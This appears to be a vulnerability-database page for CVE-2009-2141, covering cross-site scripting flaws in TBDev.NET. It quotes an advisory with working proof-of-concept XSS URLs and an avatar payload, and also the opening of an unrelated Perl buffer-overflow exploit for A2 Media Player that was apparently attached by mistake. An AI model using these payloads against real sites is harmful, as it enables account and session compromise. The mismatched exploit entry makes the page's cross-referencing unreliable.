CVE-2009-2141
published 2009-06-22CVE-2009-2141: Multiple cross-site scripting (XSS) vulnerabilities in TBDev.NET 01-01-08 allow remote attackers to inject arbitrary web script or HTML via (1) the returnto…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.48%
70.8th percentile
Multiple cross-site scripting (XSS) vulnerabilities in TBDev.NET 01-01-08 allow remote attackers to inject arbitrary web script or HTML via (1) the returnto parameter to makepoll.php, (2) the returnto parameter in a delete action to polls.php, or the (3) Info or (4) Avatar field to my.php.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)
exploitdb·2009-08-06
CVE-2009-4549 A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)
A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# A2 Media Player ProV2.51(.m3u /m3l)Universal Local Buffer Exploit (SEH)
# ## easy #### this work sooooooooo good####################################
############################################################################
##Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team###################
##AND special THANKS FOR His0k4 i respect him so much god with him #########
############################################################################
# http://download.cnet.com/A2-Media-Player-Pro/3000-2141_4-10059847.html
############################################################################
my $bof="\x41" x 4103;
my $nsh="\xEB\x06\x90\x90"
Exploit-DB
tbdev 01-01-2008 - Multiple Vulnerabilities
exploitdb·2009-06-12
CVE-2009-2141 tbdev 01-01-2008 - Multiple Vulnerabilities
tbdev 01-01-2008 - Multiple Vulnerabilities
---
TBDev - Cross Site Scripting and HTML Injection Vulnerabilities
Version Affected: 01-01-2008 (16th January 2008) (newest)
Info: TBDEV.NET is a project to further enhance, update and develop a
software (php peer-to-peer) from the original torrentbits/bytemonsoon
source code.
Credits: InterN0T
External Links:
http://www.tbdev.net
-:: The Advisory ::-
Vulnerable Function / ID Calls:
returnto
Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=>alert(0)
http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=>alert(0)alert(0) << is reflected
locally only!
2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript:alert(0)
2b) Affected Sites by HTML Inj
No writeups or analysis indexed.
http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.htmlhttp://secunia.com/advisories/35378https://www.exploit-db.com/exploits/8942http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.htmlhttp://secunia.com/advisories/35378https://www.exploit-db.com/exploits/8942
2009-06-22
Published